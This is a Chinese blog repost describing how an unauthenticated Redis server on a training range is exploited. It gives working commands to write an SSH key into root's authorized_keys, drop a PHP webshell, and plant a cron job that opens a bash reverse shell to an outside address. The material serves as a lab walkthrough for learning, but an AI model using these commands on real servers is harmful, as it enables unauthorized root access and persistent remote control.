内容简介:Redis默认配置未配置密码,如果Redis以root用户运行,攻击者可以给root账号写入SSH公钥文件,直接通过SSH免密登录服务器。Redis默认端口为6379端口。若此端口未限制公网访问,会导致Redis服务暴露公网,造成未授权访问。已知网络靶场IP为219.153.49.228,Redis端 口为47234,提供了http端口为41481。使用redis客户端进行连接尝试:
Redis默认配置未配置密码,如果 Redis 以root用户运行,攻击者可以给root账号写入SSH公钥文件,直接通过SSH免密登录服务器。Redis默认端口为6379端口。若此端口未限制公网访问,会导致Redis服务暴露公网,造成未授权访问。
0x02 攻击手段
连接测试
已知网络靶场IP为219.153.49.228,Redis端 口为47234,提供了http端口为41481。使用redis客户端进行连接尝试:
./redis-cli -h 219.153.49.228 -p 47234
本地生成公私钥
若Redis以root用户运行,可以直接将本地生成的公钥导入到/root/.ssh/authorized.keys文件中实现免密登录。
ssh-keygen -t rsa
公钥写入
由于网络靶场写入/root/.ssh/的权限受限,因此以之前对公司内网测试获取的一台Redis服务器为例。
先将公钥写入文件:
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > h.txt
将h.txt的内容写入到redis服务器key为test对应的value中。
cat h.txt | /usr/redis/./redis-cli -h xxx.xxx.xxx.xxx -p 6389 -x set test
设置redis的dbfilename路径为/root/.ssh/authorized_keys,并保存。
config set dir /root/.ssh config set dbfilename authorized_keys save
直接使用ssh访问服务器查看权限和文件,可见为root权限用户。
写入webshell
网络靶场写入/root/.ssh/的权限受限,且存在 php 站点,因此尝试写入webshell。
设置Redis备份目录为php站点目录:/var/www/html/,文件名任意。
使用浏览器访问webshell,可以正常访问。
写入定时任务
同理,将Redis备份目录改为/var/spool/cron,使用nc进行监听反弹shell。
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/ip_addr/port 0>&1\n\n" config set dir /var/spool/cron config set dbfilename root
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- Redis 未授权访问个⼈总结
- Redis未授权访问漏洞复现
- solr未授权访问漏洞的利用
- WIKI | 未授权访问的tips
- memcache 端口11211 未授权访问漏洞修复
- 漏洞预警:Hadoop 未授权访问可导致数据泄露
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
数据库索引设计与优化
【美】Tapio Lahdenmaki、【美】Michael Leach / 曹怡倩、赵建伟 / 电子工业出版社 / 2015-6 / 79.00元
《数据库索引设计与优化》提供了一种简单、高效、通用的关系型数据库索引设计方法。作者通过系统的讲解及大量的案例清晰地阐释了关系型数据库的访问路径选择原理,以及表和索引的扫描方式,详尽地讲解了如何快速地估算SQL 运行的CPU 时间及执行时间,帮助读者从原理上理解SQL、表及索引结构、访问方式等对关系型数据库造成的影响,并能够运用量化的方法进行判断和优化,指导关系型数据库的索引设计。 《数据库索......一起来看看 《数据库索引设计与优化》 这本书的介绍吧!